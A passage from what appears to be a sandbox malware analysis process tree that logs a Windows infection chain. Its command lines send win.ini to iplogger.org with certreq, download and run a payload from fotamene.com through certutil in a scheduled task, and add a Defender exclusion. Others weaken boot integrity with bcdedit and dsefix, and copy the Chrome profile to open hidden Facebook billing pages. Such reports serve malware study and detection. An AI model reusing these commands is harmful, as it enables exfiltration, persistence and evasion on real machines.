        C:\Windows\SysWOW64\cmd.exe
        
        "cmd.exe" /c certreq -post -config https://iplogger.org/1aSny7 %windir%\\win.ini %temp%\\2 & del %temp%\\2
        10⤵
        
        PID:4948
        
        C:\Windows\SysWOW64\certreq.exe
        
        certreq -post -config https://iplogger.org/1aSny7 C:\Windows\\win.ini C:\Users\Admin\AppData\Local\Temp\\2
        11⤵
        
        PID:5532
        
        C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        "powershell" -command "Invoke-WebRequest -URI https://iplogger.org/1aSny7"
        10⤵
        Blocklisted process makes network request
        Drops file in System32 directory
        
        PID:5104
        
        C:\Program Files (x86)\JCleaner\8.exe
        
        "C:\Program Files (x86)\JCleaner\8.exe"
        10⤵
        Executes dropped EXE
        Suspicious use of SetWindowsHookEx
        
        PID:4308
        
        C:\Windows\SysWOW64\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /c echo grYNxrw
        11⤵
        
        PID:4696
        
        C:\Windows\SysWOW64\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /c cmd < Nemica.sys
        11⤵
        
        PID:5472
        
        C:\Windows\SysWOW64\cmd.exe
        
        cmd
        12⤵
        
        PID:5908
        
        C:\Windows\SysWOW64\findstr.exe
        
        findstr /V /R "^PjMCYRVvFiGYRZCsTsllRymwdfLpHzjkTlyvJeXJBvVpnBIRpeOsWfRKMKjJuLOkUcyGUyIRzAIxpdCOHTqEEVgDaxJYPgDPHJgevwWrxWXvGvAcibwjLpHZiBgmcK$" Acre.wmz
        13⤵
        
        PID:2684
        
        C:\Users\Admin\AppData\Local\Temp\koIijIMhEUjPv\Fai.com
        
        Fai.com Far.xlt
        13⤵
        
        PID:5152
        
        C:\Users\Admin\AppData\Local\Temp\koIijIMhEUjPv\Fai.com
        
        C:\Users\Admin\AppData\Local\Temp\koIijIMhEUjPv\Fai.com Far.xlt
        14⤵
        
        PID:6176
        
        C:\Users\Admin\AppData\Local\Temp\koIijIMhEUjPv\Fai.com
        
        C:\Users\Admin\AppData\Local\Temp\koIijIMhEUjPv\Fai.com
        15⤵
        
        PID:8688
        
        C:\Windows\SysWOW64\cmd.exe
        
        cmd.exe /C ver > "C:\Users\Admin\AppData\Local\Temp\chrA696.tmp"
        16⤵
        
        PID:9568
        
        C:\Windows\SysWOW64\cmd.exe
        
        cmd.exe /C wmic process get Name > "C:\Users\Admin\AppData\Local\Temp\chrB8E7.tmp"
        16⤵
        
        PID:7284
        
        C:\Windows\SysWOW64\Wbem\WMIC.exe
        
        wmic process get Name
        17⤵
        
        PID:5164
        
        C:\Windows\SysWOW64\cmd.exe
        
        cmd /c makecab /V3 "C:\Users\Admin\AppData\Local\Temp\43340bb820b08480496b6ed870082fc2c6cbe815" "C:\Users\Admin\AppData\Local\Temp\chrC0A8.tmp"
        16⤵
        
        PID:7020
        
        C:\Windows\SysWOW64\makecab.exe
        
        makecab /V3 "C:\Users\Admin\AppData\Local\Temp\43340bb820b08480496b6ed870082fc2c6cbe815" "C:\Users\Admin\AppData\Local\Temp\chrC0A8.tmp"
        17⤵
        
        PID:7868
        
        C:\Windows\SysWOW64\PING.EXE
        
        ping 127.0.0.1 -n 30
        13⤵
        Runs ping.exe
        
        PID:7108
        
        C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        "powershell" -command "Invoke-WebRequest -URI https://iplogger.org/1EaGq7"
        10⤵
        Blocklisted process makes network request
        Drops file in System32 directory
        
        PID:1616
        
        C:\Windows\SysWOW64\cmd.exe
        
        "cmd.exe" /c "start https://iplogger.org/1EaGq7"
        10⤵
        
        PID:4324
        
        C:\Windows\SysWOW64\cmd.exe
        
        "cmd.exe" /c certreq -post -config https://iplogger.org/1EaGq7 %windir%\\win.ini %temp%\\2 & del %temp%\\2
        10⤵
        
        PID:2944
        
        C:\Windows\SysWOW64\certreq.exe
        
        certreq -post -config https://iplogger.org/1EaGq7 C:\Windows\\win.ini C:\Users\Admin\AppData\Local\Temp\\2
        11⤵
        
        PID:5520
        
        C:\Program Files (x86)\JCleaner\Venita.exe
        
        "C:\Program Files (x86)\JCleaner\Venita.exe"
        10⤵
        Executes dropped EXE
        Suspicious use of SetThreadContext
        
        PID:4100
        
        C:\Program Files (x86)\JCleaner\Venita.exe
        
        "{path}"
        11⤵
        
        PID:4276
        
        C:\Program Files (x86)\JCleaner\Brava.exe
        
        "C:\Program Files (x86)\JCleaner\Brava.exe"
        10⤵
        Executes dropped EXE
        Suspicious use of SetWindowsHookEx
        
        PID:2268
        
        C:\Windows\SysWOW64\cmd.exe
        
        "cmd.exe" /c "start https://iplogger.org/1aSny7"
        10⤵
        
        PID:4992
        
        C:\Users\Admin\AppData\Local\Temp\ohf1i3edy3f\vpn.exe
        
        "C:\Users\Admin\AppData\Local\Temp\ohf1i3edy3f\vpn.exe" /silent /subid=482
        8⤵
        Executes dropped EXE
        Suspicious use of SetWindowsHookEx
        
        PID:5080
        
        C:\Users\Admin\AppData\Local\Temp\is-N1HEA.tmp\vpn.tmp
        
        "C:\Users\Admin\AppData\Local\Temp\is-N1HEA.tmp\vpn.tmp" /SL5="$303B6,15170975,270336,C:\Users\Admin\AppData\Local\Temp\ohf1i3edy3f\vpn.exe" /silent /subid=482
        9⤵
        Executes dropped EXE
        Loads dropped DLL
        Drops file in Program Files directory
        Modifies system certificate store
        Suspicious use of FindShellTrayWindow
        Suspicious use of SetWindowsHookEx
        
        PID:4780
        
        C:\Windows\SysWOW64\cmd.exe
        
        C:\Windows\system32\cmd.exe /c ""C:\Program Files (x86)\MaskVPN\driver\win764\uninstall.bat" "
        10⤵
        
        PID:2236
        
        C:\Program Files (x86)\MaskVPN\driver\win764\tapinstall.exe
        
        tapinstall.exe remove tap0901
        11⤵
        
        PID:2504
        
        C:\Windows\SysWOW64\cmd.exe
        
        C:\Windows\system32\cmd.exe /c ""C:\Program Files (x86)\MaskVPN\driver\win764\install.bat" "
        10⤵
        
        PID:5196
        
        C:\Program Files (x86)\MaskVPN\driver\win764\tapinstall.exe
        
        tapinstall.exe install OemVista.inf tap0901
        11⤵
        Drops file in System32 directory
        Drops file in Windows directory
        Checks SCSI registry key(s)
        Modifies system certificate store
        Suspicious use of SetWindowsHookEx
        
        PID:5224
        
        C:\Program Files (x86)\MaskVPN\mask_svc.exe
        
        "C:\Program Files (x86)\MaskVPN\mask_svc.exe" uninstall
        10⤵
        Suspicious use of NtSetInformationThreadHideFromDebugger
        Suspicious use of SetWindowsHookEx
        
        PID:3816
        
        C:\Program Files (x86)\MaskVPN\mask_svc.exe
        
        "C:\Program Files (x86)\MaskVPN\mask_svc.exe" install
        10⤵
        Suspicious use of NtSetInformationThreadHideFromDebugger
        Suspicious use of SetWindowsHookEx
        
        PID:4960
        
        C:\Users\Admin\AppData\Local\Temp\w3uzrqviuv0\app.exe
        
        "C:\Users\Admin\AppData\Local\Temp\w3uzrqviuv0\app.exe" /8-23
        8⤵
        Executes dropped EXE
        Loads dropped DLL
        Drops file in Program Files directory
        Suspicious use of SetWindowsHookEx
        
        PID:5316
        
        C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -inputformat none -outputformat none -NonInteractive -Command Add-MpPreference -ExclusionPath "C:\Program Files (x86)\Rough-Voice"
        9⤵
        
        PID:5256
        
        C:\Program Files (x86)\Rough-Voice\7za.exe
        
        "C:\Program Files (x86)\Rough-Voice\7za.exe" e -p154.61.71.13 winamp-plugins.7z
        9⤵
        Drops file in Program Files directory
        Suspicious use of SetWindowsHookEx
        
        PID:2320
        
        C:\Windows\SysWOW64\cmd.exe
        
        "C:\Windows\system32\cmd.exe" /c ""C:\Program Files (x86)\Rough-Voice\app.exe" -map "C:\Program Files (x86)\Rough-Voice\WinmonProcessMonitor.sys""
        9⤵
        
        PID:4976
        
        C:\Program Files (x86)\Rough-Voice\app.exe
        
        "C:\Program Files (x86)\Rough-Voice\app.exe" -map "C:\Program Files (x86)\Rough-Voice\WinmonProcessMonitor.sys"
        10⤵
        Suspicious behavior: LoadsDriver
        
        PID:5012
        
        C:\Program Files (x86)\Rough-Voice\7za.exe
        
        "C:\Program Files (x86)\Rough-Voice\7za.exe" e -p154.61.71.13 winamp.7z
        9⤵
        Drops file in Program Files directory
        Suspicious use of SetWindowsHookEx
        
        PID:4468
        
        C:\Program Files (x86)\Rough-Voice\app.exe
        
        "C:\Program Files (x86)\Rough-Voice\app.exe" /8-23
        9⤵
        
        PID:5588
        
        C:\Program Files (x86)\Rough-Voice\app.exe
        
        "C:\Program Files (x86)\Rough-Voice\app.exe" /8-23
        10⤵
        
        PID:1000
        
        C:\Windows\System32\cmd.exe
        
        C:\Windows\Sysnative\cmd.exe /C "netsh advfirewall firewall add rule name="csrss" dir=in action=allow program="C:\Windows\rss\csrss.exe" enable=yes"
        11⤵
        
        PID:5332
        
        C:\Windows\system32\netsh.exe
        
        netsh advfirewall firewall add rule name="csrss" dir=in action=allow program="C:\Windows\rss\csrss.exe" enable=yes
        12⤵
        
        PID:1440
        
        C:\Windows\rss\csrss.exe
        
        C:\Windows\rss\csrss.exe /8-23
        11⤵
        
        PID:6200
        
        C:\Windows\SYSTEM32\schtasks.exe
        
        schtasks /CREATE /SC ONLOGON /RL HIGHEST /TR "C:\Windows\rss\csrss.exe" /TN csrss /F
        12⤵
        Creates scheduled task(s)
        
        PID:5208
        
        C:\Windows\SYSTEM32\schtasks.exe
        
        schtasks /CREATE /SC ONLOGON /RL HIGHEST /RU SYSTEM /TR "cmd.exe /C certutil.exe -urlcache -split -f https://fotamene.com/app/app.exe C:\Users\Admin\AppData\Local\Temp\csrss\scheduled.exe && C:\Users\Admin\AppData\Local\Temp\csrss\scheduled.exe /31340" /TN ScheduledUpdate /F
        12⤵
        Creates scheduled task(s)
        
        PID:5332
        
        C:\Users\Admin\AppData\Local\Temp\csrss\patch.exe
        
        "C:\Users\Admin\AppData\Local\Temp\csrss\patch.exe"
        12⤵
        
        PID:6008
        
        C:\Windows\system32\bcdedit.exe
        
        C:\Windows\system32\bcdedit.exe -create {71A3C7FC-F751-4982-AEC1-E958357E6813} -d "Windows Fast Mode" -application OSLOADER
        13⤵
        Modifies boot configuration data using bcdedit
        
        PID:2224
        
        C:\Windows\system32\bcdedit.exe
        
        C:\Windows\system32\bcdedit.exe -set {71A3C7FC-F751-4982-AEC1-E958357E6813} device partition=C:
        13⤵
        Modifies boot configuration data using bcdedit
        
        PID:6296
        
        C:\Windows\system32\bcdedit.exe
        
        C:\Windows\system32\bcdedit.exe -set {71A3C7FC-F751-4982-AEC1-E958357E6813} osdevice partition=C:
        13⤵
        Modifies boot configuration data using bcdedit
        
        PID:1440
        
        C:\Windows\system32\bcdedit.exe
        
        C:\Windows\system32\bcdedit.exe -set {71A3C7FC-F751-4982-AEC1-E958357E6813} systemroot \Windows
        13⤵
        Modifies boot configuration data using bcdedit
        
        PID:6808
        
        C:\Windows\system32\bcdedit.exe
        
        C:\Windows\system32\bcdedit.exe -set {71A3C7FC-F751-4982-AEC1-E958357E6813} path \Windows\system32\osloader.exe
        13⤵
        Modifies boot configuration data using bcdedit
        
        PID:6312
        
        C:\Windows\system32\bcdedit.exe
        
        C:\Windows\system32\bcdedit.exe -set {71A3C7FC-F751-4982-AEC1-E958357E6813} kernel ntkrnlmp.exe
        13⤵
        Modifies boot configuration data using bcdedit
        
        PID:6248
        
        C:\Windows\system32\bcdedit.exe
        
        C:\Windows\system32\bcdedit.exe -set {71A3C7FC-F751-4982-AEC1-E958357E6813} recoveryenabled 0
        13⤵
        Modifies boot configuration data using bcdedit
        
        PID:6356
        
        C:\Windows\system32\bcdedit.exe
        
        C:\Windows\system32\bcdedit.exe -set {71A3C7FC-F751-4982-AEC1-E958357E6813} nx OptIn
        13⤵
        Modifies boot configuration data using bcdedit
        
        PID:5956
        
        C:\Windows\system32\bcdedit.exe
        
        C:\Windows\system32\bcdedit.exe -set {71A3C7FC-F751-4982-AEC1-E958357E6813} nointegritychecks 1
        13⤵
        Modifies boot configuration data using bcdedit
        
        PID:6116
        
        C:\Windows\System32\Conhost.exe
        
        \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
        14⤵
        
        PID:4400
        
        C:\Windows\system32\bcdedit.exe
        
        C:\Windows\system32\bcdedit.exe -set {71A3C7FC-F751-4982-AEC1-E958357E6813} inherit {bootloadersettings}
        13⤵
        Modifies boot configuration data using bcdedit
        
        PID:7064
        
        C:\Windows\system32\bcdedit.exe
        
        C:\Windows\system32\bcdedit.exe -displayorder {71A3C7FC-F751-4982-AEC1-E958357E6813} -addlast
        13⤵
        Modifies boot configuration data using bcdedit
        
        PID:7056
        
        C:\Windows\system32\bcdedit.exe
        
        C:\Windows\system32\bcdedit.exe -timeout 0
        13⤵
        Modifies boot configuration data using bcdedit
        Checks SCSI registry key(s)
        Modifies data under HKEY_USERS
        
        PID:6788
        
        C:\Windows\system32\bcdedit.exe
        
        C:\Windows\system32\bcdedit.exe -default {71A3C7FC-F751-4982-AEC1-E958357E6813}
        13⤵
        Modifies boot configuration data using bcdedit
        
        PID:6328
        
        C:\Windows\system32\bcdedit.exe
        
        C:\Windows\system32\bcdedit.exe -set bootmenupolicy legacy
        13⤵
        Modifies boot configuration data using bcdedit
        
        PID:6440
        
        C:\Windows\System32\bcdedit.exe
        
        C:\Windows\Sysnative\bcdedit.exe /v
        12⤵
        Modifies boot configuration data using bcdedit
        
        PID:6916
        
        C:\Users\Admin\AppData\Local\Temp\csrss\dsefix.exe
        
        C:\Users\Admin\AppData\Local\Temp\csrss\dsefix.exe
        12⤵
        
        PID:7152
        
        C:\Users\Admin\AppData\Local\Temp\csrss\ww31.exe
        
        C:\Users\Admin\AppData\Local\Temp\csrss\ww31.exe
        12⤵
        
        PID:3476
        
        C:\Users\Admin\AppData\Local\Temp\csrss\u20200626.exe
        
        C:\Users\Admin\AppData\Local\Temp\csrss\u20200626.exe
        12⤵
        
        PID:4984
        
        C:\Users\Admin\AppData\Local\Temp\csrss\u20200626.exe
        
        "C:\Users\Admin\AppData\Local\Temp\csrss\u20200626.exe"
        13⤵
        
        PID:5336
        
        C:\Users\Admin\AppData\Local\Temp\csrss\getfp.exe
        
        C:\Users\Admin\AppData\Local\Temp\csrss\getfp.exe
        12⤵
        
        PID:6852
        
        C:\Windows\System32\Conhost.exe
        
        \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
        13⤵
        
        PID:7096
        
        C:\Users\Admin\AppData\Local\Temp\csrss\getfp.exe
        
        "C:\Users\Admin\AppData\Local\Temp\csrss\getfp.exe"
        13⤵
        
        PID:3660
        
        C:\Program Files\Google\Chrome\Application\chrome.exe
        
        "C:\Program Files\Google\Chrome\Application\chrome.exe" http://humisnee.com/test.php?uuid=52714bd3-795e-42d3-b636-84cfef686d1c&browser=chrome
        14⤵
        
        PID:7364
        
        C:\Program Files\Google\Chrome\Application\chrome.exe
        
        "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" --url=https://clients2.google.com/cr/report --annotation=channel= --annotation=plat=Win64 --annotation=prod=Chrome --annotation=ver=86.0.4240.111 --initial-client-data=0xcc,0xd0,0xd4,0xb0,0xd8,0x7ffab62a6e00,0x7ffab62a6e10,0x7ffab62a6e20
        15⤵
        
        PID:7372
        
        C:\Program Files\Google\Chrome\Application\chrome.exe
        
        "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --field-trial-handle=1688,11234839480001765907,12836228124991284744,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=2260 /prefetch:8
        15⤵
        
        PID:7656
        
        C:\Program Files\Google\Chrome\Application\chrome.exe
        
        "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --field-trial-handle=1688,11234839480001765907,12836228124991284744,131072 --lang=en-US --service-sandbox-type=network --mojo-platform-channel-handle=1748 /prefetch:8
        15⤵
        
        PID:7648
        
        C:\Program Files\Google\Chrome\Application\chrome.exe
        
        "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=gpu-process --field-trial-handle=1688,11234839480001765907,12836228124991284744,131072 --gpu-preferences=MAAAAAAAAADgAAAwAAAAAAAAAAAAAAAAAABgAAAAAAAQAAAAAAAAAAAAAAAAAAAAKAAAAAQAAAAgAAAAAAAAACgAAAAAAAAAMAAAAAAAAAA4AAAAAAAAABAAAAAAAAAAAAAAAAUAAAAQAAAAAAAAAAAAAAAGAAAAEAAAAAAAAAABAAAABQAAABAAAAAAAAAAAQAAAAYAAAA= --mojo-platform-channel-handle=1700 /prefetch:2
        15⤵
        
        PID:7640
        
        C:\Program Files\Google\Chrome\Application\chrome.exe
        
        "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --field-trial-handle=1688,11234839480001765907,12836228124991284744,131072 --lang=en-US --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=7 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=2848 /prefetch:1
        15⤵
        
        PID:7904
        
        C:\Program Files\Google\Chrome\Application\chrome.exe
        
        "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --field-trial-handle=1688,11234839480001765907,12836228124991284744,131072 --lang=en-US --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=8 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=2828 /prefetch:1
        15⤵
        
        PID:7896
        
        C:\Program Files\Google\Chrome\Application\chrome.exe
        
        "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --field-trial-handle=1688,11234839480001765907,12836228124991284744,131072 --lang=en-US --extension-process --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=4 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=2868 /prefetch:1
        15⤵
        
        PID:8020
        
        C:\Program Files\Google\Chrome\Application\chrome.exe
        
        "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --field-trial-handle=1688,11234839480001765907,12836228124991284744,131072 --lang=en-US --extension-process --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=5 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3524 /prefetch:1
        15⤵
        
        PID:8096
        
        C:\Program Files\Google\Chrome\Application\chrome.exe
        
        "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.UtilWin --field-trial-handle=1688,11234839480001765907,12836228124991284744,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=4928 /prefetch:8
        15⤵
        
        PID:8784
        
        C:\Program Files\Google\Chrome\Application\chrome.exe
        
        "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.UtilWin --field-trial-handle=1688,11234839480001765907,12836228124991284744,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=3532 /prefetch:8
        15⤵
        
        PID:9532
        
        C:\Program Files\Google\Chrome\Application\chrome.exe
        
        "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.UtilWin --field-trial-handle=1688,11234839480001765907,12836228124991284744,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=1848 /prefetch:8
        15⤵
        
        PID:5192
        
        C:\Program Files\Google\Chrome\Application\chrome.exe
        
        "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=gpu-process --field-trial-handle=1688,11234839480001765907,12836228124991284744,131072 --disable-gpu-sandbox --use-gl=disabled --gpu-vendor-id=5140 --gpu-device-id=140 --gpu-sub-system-id=0 --gpu-revision=0 --gpu-driver-version=10.0.15063.0 --gpu-preferences=MAAAAAAAAADoAAAwAAAAAAAAAAAAAAAAAABgAAAIAAAQAAAAAAAAAAAAAAAAAAAAKAAAAAQAAAAgAAAAAAAAACgAAAAAAAAAMAAAAAAAAAA4AAAAAAAAABAAAAAAAAAAAAAAAAUAAAAQAAAAAAAAAAAAAAAGAAAAEAAAAAAAAAABAAAABQAAABAAAAAAAAAAAQAAAAYAAAA= --mojo-platform-channel-handle=1620 /prefetch:2
        15⤵
        
        PID:8712
        
        C:\Users\Admin\AppData\Local\Temp\csrss\mg20201223-1.exe
        
        C:\Users\Admin\AppData\Local\Temp\csrss\mg20201223-1.exe
        12⤵
        
        PID:6268
        
        C:\Users\Admin\AppData\Local\Temp\csrss\ml20201223.exe
        
        C:\Users\Admin\AppData\Local\Temp\csrss\ml20201223.exe
        12⤵
        
        PID:3888
        
        C:\Users\Admin\AppData\Local\Temp\csrss\m672.exe
        
        C:\Users\Admin\AppData\Local\Temp\csrss\m672.exe
        12⤵
        
        PID:6184
        
        C:\Users\Admin\AppData\Local\Temp\ndz5xahgdxy\vict.exe
        
        "C:\Users\Admin\AppData\Local\Temp\ndz5xahgdxy\vict.exe" /VERYSILENT /id=535
        8⤵
        
        PID:5244
        
        C:\Users\Admin\AppData\Local\Temp\is-77L5O.tmp\vict.tmp
        
        "C:\Users\Admin\AppData\Local\Temp\is-77L5O.tmp\vict.tmp" /SL5="$504B4,870426,780800,C:\Users\Admin\AppData\Local\Temp\ndz5xahgdxy\vict.exe" /VERYSILENT /id=535
        9⤵
        
        PID:4328
        
        C:\Users\Admin\AppData\Local\Temp\is-M6FMH.tmp\wimapi.exe
        
        "C:\Users\Admin\AppData\Local\Temp\is-M6FMH.tmp\wimapi.exe" 535
        10⤵
        
        PID:7152
        
        C:\Users\Admin\AppData\Local\Temp\cy25g1jrnsd\askinstall24.exe
        
        "C:\Users\Admin\AppData\Local\Temp\cy25g1jrnsd\askinstall24.exe"
        8⤵
        
        PID:6148
        
        C:\Windows\SysWOW64\cmd.exe
        
        cmd.exe /c taskkill /f /im chrome.exe
        9⤵
        
        PID:6916
        
        C:\Windows\SysWOW64\taskkill.exe
        
        taskkill /f /im chrome.exe
        10⤵
        Kills process with taskkill
        
        PID:3280
        
        C:\Windows\SysWOW64\xcopy.exe
        
        xcopy "C:\Users\Admin\AppData\Local\Google\Chrome\User Data" "C:\Users\Admin\AppData\Local\Temp\gcfgjfgjaa99\" /s /e /y
        9⤵
        
        PID:5516
        
        C:\Program Files\Google\Chrome\Application\chrome.exe
        
        "C:\Program Files\Google\Chrome\Application\chrome.exe" --window-position=-50000,-50000 --user-data-dir="C:\Users\Admin\AppData\Local\Temp\gcfgjfgjaa99" https://www.facebook.com/ https://www.facebook.com/pages/ https://secure.facebook.com/ads/manager/account_settings/account_billing/
        9⤵
        
        PID:8872
        
        C:\Program Files\Google\Chrome\Application\chrome.exe
        
        "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=crashpad-handler --user-data-dir=C:\Users\Admin\AppData\Local\Temp\gcfgjfgjaa99 /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler --database=C:\Users\Admin\AppData\Local\Temp\gcfgjfgjaa99\Crashpad --metrics-dir=C:\Users\Admin\AppData\Local\Temp\gcfgjfgjaa99 --url=https://clients2.google.com/cr/report --annotation=channel= --annotation=plat=Win64 --annotation=prod=Chrome --annotation=ver=86.0.4240.111 --initial-client-data=0xec,0xf0,0xf4,0xc8,0xf8,0x7ffab62a6e00,0x7ffab62a6e10,0x7ffab62a6e20
        10⤵
        
        PID:8880
        
        C:\Program Files\Google\Chrome\Application\chrome.exe
        
        "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --field-trial-handle=1612,616311985310121319,2674027892819348637,131072 --lang=en-US --service-sandbox-type=utility --user-data-dir="C:\Users\Admin\AppData\Local\Temp\gcfgjfgjaa99" --mojo-platform-channel-handle=2224 /prefetch:8
        10⤵
        
        PID:6344
        
        C:\Program Files\Google\Chrome\Application\chrome.exe
        
        "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --field-trial-handle=1612,616311985310121319,2674027892819348637,131072 --lang=en-US --service-sandbox-type=network --user-data-dir="C:\Users\Admin\AppData\Local\Temp\gcfgjfgjaa99" --mojo-platform-channel-handle=1664 /prefetch:8
        10⤵
        
        PID:6528
        
        C:\Program Files\Google\Chrome\Application\chrome.exe
        
        "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=gpu-process --field-trial-handle=1612,616311985310121319,2674027892819348637,131072 --user-data-dir="C:\Users\Admin\AppData\Local\Temp\gcfgjfgjaa99" --gpu-preferences=MAAAAAAAAADgAAAwAAAAAAAAAAAAAAAAAABgAAAAAAAQAAAAAAAAAAAAAAAAAAAAKAAAAAQAAAAgAAAAAAAAACgAAAAAAAAAMAAAAAAAAAA4AAAAAAAAABAAAAAAAAAAAAAAAAUAAAAQAAAAAAAAAAAAAAAGAAAAEAAAAAAAAAABAAAABQAAABAAAAAAAAAAAQAAAAYAAAA= --mojo-platform-channel-handle=1624 /prefetch:2
        10⤵
        
        PID:5384
        
        C:\Program Files\Google\Chrome\Application\chrome.exe
        
        "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --field-trial-handle=1612,616311985310121319,2674027892819348637,131072 --lang=en-US --user-data-dir="C:\Users\Admin\AppData\Local\Temp\gcfgjfgjaa99" --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=7 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=2876 /prefetch:1
        10⤵
        
        PID:7140
        
        C:\Program Files\Google\Chrome\Application\chrome.exe
        
        "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --field-trial-handle=1612,616311985310121319,2674027892819348637,131072 --lang=en-US --user-data-dir="C:\Users\Admin\AppData\Local\Temp\gcfgjfgjaa99" --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=8 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=2868 /prefetch:1
        10⤵
        
        PID:3956
        
        C:\Program Files\Google\Chrome\Application\chrome.exe
        
        "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --field-trial-handle=1612,616311985310121319,2674027892819348637,131072 --lang=en-US --user-data-dir="C:\Users\Admin\AppData\Local\Temp\gcfgjfgjaa99" --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=10 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3276 /prefetch:1
        10⤵
        
        PID:6240
        
        C:\Program Files\Google\Chrome\Application\chrome.exe
        
        "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --field-trial-handle=1612,616311985310121319,2674027892819348637,131072 --lang=en-US --user-data-dir="C:\Users\Admin\AppData\Local\Temp\gcfgjfgjaa99" --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=9 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3052 /prefetch:1
        10⤵
        
        PID:7124
        
        C:\Program Files\Google\Chrome\Application\chrome.exe
        
        "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --field-trial-handle=1612,616311985310121319,2674027892819348637,131072 --lang=en-US --user-data-dir="C:\Users\Admin\AppData\Local\Temp\gcfgjfgjaa99" --extension-process --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=4 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3628 /prefetch:1
        10⤵
        
        PID:6056
        
        C:\Program Files\Google\Chrome\Application\chrome.exe
        
        "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --field-trial-handle=1612,616311985310121319,2674027892819348637,131072 --disable-gpu-compositing --lang=en-US --user-data-dir="C:\Users\Admin\AppData\Local\Temp\gcfgjfgjaa99" --extension-process --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=5 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3864 /prefetch:1
        10⤵
        
        PID:7276
        
        C:\Program Files\Google\Chrome\Application\chrome.exe
        
        "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --field-trial-handle=1612,616311985310121319,2674027892819348637,131072 --lang=en-US --service-sandbox-type=utility --user-data-dir="C:\Users\Admin\AppData\Local\Temp\gcfgjfgjaa99" --mojo-platform-channel-handle=4816 /prefetch:8
        10⤵
        
        PID:7332
        
        C:\Program Files\Google\Chrome\Application\chrome.exe
        
        "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.UtilWin --field-trial-handle=1612,616311985310121319,2674027892819348637,131072 --lang=en-US --service-sandbox-type=none --user-data-dir="C:\Users\Admin\AppData\Local\Temp\gcfgjfgjaa99" --mojo-platform-channel-handle=5328 /prefetch:8
        10⤵
        
        PID:9592
        
        C:\Program Files\Google\Chrome\Application\chrome.exe
        
        "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.UtilWin --field-trial-handle=1612,616311985310121319,2674027892819348637,131072 --lang=en-US --service-sandbox-type=none --user-data-dir="C:\Users\Admin\AppData\Local\Temp\gcfgjfgjaa99" --mojo-platform-channel-handle=5212 /prefetch:8
        10⤵
        
        PID:8116
        
        C:\Program Files\Google\Chrome\Application\chrome.exe
        
        "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.UtilWin --field-trial-handle=1612,616311985310121319,2674027892819348637,131072 --lang=en-US --service-sandbox-type=none --user-data-dir="C:\Users\Admin\AppData\Local\Temp\gcfgjfgjaa99" --mojo-platform-channel-handle=928 /prefetch:8
        10⤵
        
        PID:6292
        
        C:\Program Files\Google\Chrome\Application\chrome.exe
        
